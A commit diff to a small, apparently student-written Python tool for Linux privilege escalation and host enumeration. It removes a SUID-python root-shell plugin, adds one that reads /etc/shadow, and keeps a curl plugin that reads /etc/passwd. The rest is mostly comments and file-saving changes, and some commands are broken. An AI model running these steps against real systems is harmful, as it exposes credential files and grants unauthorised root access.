Update

version 7

src/js_plugins.py

@@ -4,20 +4,15 @@
 
 from subprocess import Popen, PIPE
 
-from colors import bcolors
+from colors import bcolors  #this library is to use colores
 
 import platform
 
 import os, subprocess, tempfile, pathlib, pty, stat
 
-import calendar
-
-from datetime import datetime
-
 import tempfile
 
 
-
 # A very basic method, but useful
 def shellRun(command):
     """ Put given commands into a temporary file, spawn a shell and explain how to use the command """
@@ -48,10 +43,16 @@ def checkBinary(p):
 
 #function to create a file
 def file(choose, name, directory, text):
+    """
+    choose: option if the user want or not paste information inside the file
+    name: name of the file what user choose
+    directory: where the file is stay
+    text: the content of enumeration gonn pass inside the file
+    """
     if choose == "YES":
         #append and read a file [a+]
-        with open(f"../gather_info/{directory}/{name}.txt", "a+") as f:
-            f.write(text)    
+        with open(f"../gather_info/{directory}/{name}.txt", "a+") as f: # a+ -> append + read in a file
+            f.write(text) # write content (text) inside the file
             os.system(f"cat ../gather_info/{directory}/{name}.txt") #show information inside the file
 
     elif choose == "NO":
@@ -73,48 +74,47 @@ def execute(self):
         output = grabOutput(["/usr/bin/curl", "file:///etc/passwd"])
         print(output)
 
-class Python(PrivEsc):
+class Cat(PrivEsc):
     def __init__(self):
         self.name="Python"
         self.author="Pedro Tinoco"
-        self.description=""
+        self.description="CAT Privilege"
     def execute(self):
         print('\033c') # clean console
-        os.system("sudo sh -c 'cp $(which python) .; chmod +s ./python*'")
-        curlPath="/usr/bin/python"
-        suid=checkBinary(curlPath)
-        if not suid:
-            print(f"{curlPath} does not exist SUID bit set" )
-            return
-        output = grabOutput(["usr/bin/python", "sh", "-p"])
+        output = grabOutput(["./cat /etc/shadow"])
         print(output)
 
 
-
 class FileSystem(Enumeration):
     def __init__(self):
         Enumeration.__init__(self)
         self.name="File Systems"
         self.author="Pedro Tinoco"
         self.description="What can be found in /var/"
-        self.version = "1.0"
+        self.version = "2.0"
     def execute(self):
         print('\033c')        
-        var = []
+        var = [] #empty list
+
+        #append this enumeration to the list 
         var.append(grabOutput(['ls', '-alh', '/var/log']))
         var.append(grabOutput(['ls', '-alh', '/var/mail']))
         var.append(grabOutput(['ls', '-alh', '/var/spool']))
 
+        #option if the user want or not the enumeration information inside the file
         create_file = input("Do you want save this information in a file: YES or NO   ")
         if create_file == "YES": 
-            directory = "file_system"
-            name = input("Name of the file: ")
             print('\033c') 
-            for i in var:
-                file(create_file, name, directory, i + "-"*60 + '\n' )
-        else:
+            print("Directories: \n")
+            os.system("ls ../gather_info/") #show the directories inside the /gather_info/
+            directory = input("Name of the directory: ") #choose the directory name
+            name = input("Name of the file: ") #choose the file name
+            print('\033c') 
+            for i in var: 
+                file(create_file, name, directory, i + "-"*60 + '\n' ) #call the function and pass information into a file
+        else: #if the user dont want a file
             print('\033c') 
-            for i in var:
+            for i in var: #just print the enumeration
                 print(i)
 
 
@@ -130,45 +130,48 @@ def execute(self):
 
         enum = "YES"
 
-        while enum == "YES":
+        while enum == "YES": #while user want run the servie applications enumeration the (enum) = TRUE
 
-            var = []
-
+            var = [] # empty list
+
+            #dictionary with service application enumerations
             dictionary = {"s1":"ps aux", "s2":"ps aux | grep root", "s3":"ls -alh /sbin/"}
-
 
+            #this going to print the key (s1/s2/s3) and the corresponding value 
             for key, value in dictionary.items():
                 print(f'{key}={value}\n')
 
+            #choose what enumeration the user want run
             choose = input("Select Service Application Enumeration: ")
             for key, value in dictionary.items():
-                if choose == key:
-                    os.system(value)
+                if choose == key: #if the choose its equal to key
+                    os.system(value) #than print the corresponding enumeration
 
+            #append this enumeration to the list 
             if choose == "s1":
                 var.append(grabOutput(['ps', 'aux']))
             elif choose == "s2":
                 var.append(grabOutput(['ps', 'aux', '|', 'grep root']))
             elif choose == "s3":
                 var.append(grabOutput(['ls', '-alh', '/sbin']))
-
+
+            #option if the user want or not the enumeration information inside the file
             create_file = input("\nDo you want save this information in a file: YES or NO   ")
 
             if create_file == "YES": 
-                directory = "service_application"
-                name = input("Name of the file: ")
+                print("Directories: \n")
+                os.system("ls ../gather_info/") #show the directories inside the /gather_info/
+                directory = input("Name of the directory: ")  #choose the directory name
+                name = input("Name of the file: ") #choose the file name
                 print('\033c') 
                 for i in var:
-                    file(create_file, name, directory, i + "-"*60 + '\n' )
+                    file(create_file, name, directory, i + "-"*60 + '\n' ) #call the function and pass information into a file
 
-                enum = input("\nDo you want execute other FileSytem Enumeration ?")
+                enum = input("\nDo you want execute other FileSytem Enumeration ? YES or NO  ") #option if user want run again 
 
-            else:
-                enum = input("\nDo you want execute other FileSytem Enumeration ?")
+            else:  #if the user dont want a file
+                enum = input("\nDo you want execute other FileSytem Enumeration ? YES or NO  ") #option if user want run again 
                 print('\033c') 
-
-
-#cat /etc/passwd | cut -d : -f 1
 
 
 
@@ -182,14 +185,14 @@ def __init__(self):
     def execute(self):
         os.system("systeminfo")
 
-
+#this is a Enumeration with simple information
 class HostInfo(Enumeration):
     def __init__(self):
         Enumeration.__init__(self)
         print("\n", end="")
-        
+
         print('\tHostname: ' + '\n\t-> ' + bcolors.BOLD + bcolors.UNDERLINE + grabOutput(["hostname"]) + bcolors.ENDC, end="")
-    
+
         print('\n\tUser: ' + '\n\t-> ' + bcolors.BOLD + bcolors.UNDERLINE + grabOutput(["whoami"]) + bcolors.ENDC, end="")
 
         print('\n\tCurrently Logged in Users: ' + '\n\t-> ' + bcolors.BOLD + bcolors.UNDERLINE + grabOutput(["who", "-H"]) + bcolors.ENDC, end="")
@@ -198,9 +201,6 @@ def __init__(self):
 
         print('\n\n\tCurrent Directory: ' + '\n\t-> ' + bcolors.BOLD + bcolors.UNDERLINE + os.getcwd() + bcolors.ENDC, end="")
 
-
-        #print('\n\tUser: ' + '\n\t-> ' + grabOutput("w"), end="")
-
         print("\n\n\tID Info: ")
         idData = grabOutput("id")
         parts = idData.split(" ")

src/leap.py

@@ -5,7 +5,7 @@
 
 #--PRIVILEGE ESCALATION------------------
 from js_plugins import Curl
-from js_plugins import Python
+from js_plugins import Cat
 
 
 #--ENUMERATION---------------------------
@@ -30,7 +30,7 @@
     #Make a list of available privescs
     pes=[]
     pes.append(Curl())
-    pes.append(Python())
+    pes.append(Cat())